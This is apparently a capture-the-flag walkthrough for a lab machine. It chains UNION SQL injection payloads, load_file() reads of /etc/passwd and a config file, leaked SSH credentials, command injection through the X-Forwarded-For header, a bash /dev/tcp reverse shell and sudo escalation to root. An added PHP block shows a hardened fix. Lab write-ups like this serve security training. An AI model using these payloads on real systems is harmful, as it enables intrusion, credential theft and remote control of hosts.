nmap -p- --min-rate 10000 10.10.11.128 -Pn

After detecting the open port (80), let's run a more detailed scan against it.

nmap -A -sC -sV -p80 10.10.11.128 -Pn

Let's do directory enumeration with the gobuster tool.

gobuster dir -u http://10.10.11.128/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -x php -t 40

When I browse to challenge.php, the page asks me for a flag.

But on the main page, index.php, there is a request that asks me for a username.

Our request looks like the one below.

We can fuzz this parameter with SQLi payloads.

Let's add a UNION SQLi payload here.

player=test' union select user();-- -

Let's dump the database names via the payload below.

player=test' union select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.schemata;-- -

Let's select the november database and dump its tables.

player=' union select group_concat(table_name) from INFORMATION_SCHEMA.tables where table_schema='november';-- -

Let's dump the data from the flag table.

player=' union select group_concat(one) from flag;-- -

Flag: UHC{F1rst_5tep_2_Qualify}

We need to enter this flag into /challenge.php. When we submit it, the response we get comes from the firewall.php file.

Let's read local files through this SQL injection by using MySQL's load_file() function.

player=' union select load_file('/etc/passwd');-- -

Let's dump the config.php file, which is located at /var/www/html/config.php.

player=' union select load_file('/var/www/html/config.php');-- -

I take the credentials from this file for the target machine.

uhc: uhc-11qual-global-pw

Let's check these credentials via the ssh command.

user.txt

I enumerate the files on the box and find something interesting in the firewall.php file.

In this file you can see a call to the system() function, which executes system commands with user-controlled input, and that is dangerous.

system("sudo /usr/sbin/iptables -A INPUT -s " . $ip . " -j ACCEPT");

If we abuse this by putting malicious content into the X-Forwarded-For HTTP request header, we can execute system commands.

Note: the X-Forwarded-For HTTP request header is used to determine the client's IP address, and that is how it is used here as well.
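As an added example (not the box's own firewall.php), here is a hardened counterpart to that handler: it only honours X-Forwarded-For when the request arrives from a trusted proxy, validates the value as an IP literal with filter_var(), and still wraps it in escapeshellarg() before it reaches system(). The $trustedProxies list is an assumption for the example.

```php
<?php
// Added example: hardened counterpart to the vulnerable line
//   system("sudo /usr/sbin/iptables -A INPUT -s " . $ip . " -j ACCEPT");
// Assumption: the app sits behind one known reverse proxy ($trustedProxies).

/**
 * Returns the client IP, honouring X-Forwarded-For only when the direct
 * peer is a trusted proxy. Returns null when no valid IP literal is found.
 */
function clientIp(array $server, array $trustedProxies): ?string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (in_array($remote, $trustedProxies, true)
        && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // XFF may be a comma-separated chain; the first entry is the client.
        $parts = explode(',', $server['HTTP_X_FORWARDED_FOR']);
        $candidate = trim($parts[0]);
    } else {
        $candidate = $remote;
    }
    // Reject anything that is not a plain IPv4/IPv6 literal. A value such as
    // "1.1.1.1; ping -c 1 ..." fails this check and never reaches system().
    $ip = filter_var($candidate, FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

/** Builds the iptables command; escapeshellarg() is a second layer of defence. */
function allowCommand(string $ip): string
{
    return 'sudo /usr/sbin/iptables -A INPUT -s ' . escapeshellarg($ip) . ' -j ACCEPT';
}

$trustedProxies = ['127.0.0.1'];   // assumed address of the trusted proxy
$ip = clientIp($_SERVER, $trustedProxies);
if ($ip === null) {
    http_response_code(400);
    exit('invalid client address');
}
system(allowCommand($ip));
```

A safer design still is to avoid shelling out at all (for example by writing the address to a queue that a privileged, non-web process consumes), but the validation above already removes the injection path shown in this writeup.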

Let's check whether the command injection works by sending a request that contains the system command ping.

X-FORWARDED-FOR: 1.1.1.1; ping -c 1 10.10.14.18;

I can see whether this command was executed by watching for the ICMP packet with tcpdump -i tun0.

Now it's time to add a reverse shell to this command injection.

X-FORWARDED-FOR: 1.1.1.1; bash -c "bash -i >& /dev/tcp/10.10.14.18/1337 0>&1";

Hola! I got a reverse shell on port 1337.

Let's upgrade it to a fully interactive shell via the commands below.

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo;fg
export TERM=xterm
export SHELL=bash

Let's check this user's privileges via the sudo -l command.

As you can see, this is the easy part of privilege escalation: if we run sudo -s, we get a root shell.

root.txt